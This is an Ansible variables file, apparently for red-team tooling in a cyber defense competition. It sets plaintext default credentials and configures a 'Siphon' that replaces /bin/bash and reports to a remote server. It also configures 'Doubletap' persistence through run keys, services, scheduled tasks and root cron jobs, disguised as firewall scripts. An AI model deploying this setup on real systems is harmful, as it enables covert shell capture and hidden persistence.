# Note: file has same name as ALL group in inventory, so these vars will be used for all
#ansible_user: buyer
#ansible_password: DefaultPass1#
ansible_user: ccdc
ansible_password: ccdc

ansible_become: yes 
ansible_become_method: sudo
ansible_become_pass: ccdc

###################
# Siphon
###################
siphon_file_old_path: "/bin/bash"
siphon_file_new_path: "/bin/ash"
siphon_path: "/bin/siphon0"
siphon_logfile_path: "/output"
siphon_server_ip: "{{ hostvars['siphoner_server']['ansible_host'] }}"
siphon_server_port: "920"

###################
# Doubletap
###################
# ps1 loop
doubletap_ps1_loop_script_dest: "C:\\Windows\\Temp\\firewall_script1.ps1"
doubletap_ps1_loop_run_key_name: "DoubleTapScript"
# ps1 service
doubletap_ps1_service_script_dest: "C:\\Windows\\Temp\\firewall_script2.ps1"
doubletap_ps1_service_service_name: "DoubleTapScript"
doubletap_ps1_service_service_display_name: "DoubleTap Script"
# ps1 task
doubletap_ps1_loop_script_dest: "C:\\Windows\\Temp\\firewall_script1.ps1"
doubletap_ps1_loop_task_name: "DoubleTapScript"
# sh cron
doubletap_sh_cron_script_path: "/bin/doubletap1"
doubletap_sh_cron_job_name: "DoubleTapScript"
doubletap_sh_cron_job_user: "root"
# sh loop
doubletap_sh_loop_script_path: "/bin/doubletap2"
doubletap_sh_loop_service_name: "Doubletap"
# sh service
doubletap_sh_service_script_path: "/bin/doubletap3"
doubletap_sh_service_service_name: "DoubleTapScript"
doubletap_sh_service_service_description: "Double Tap Script"
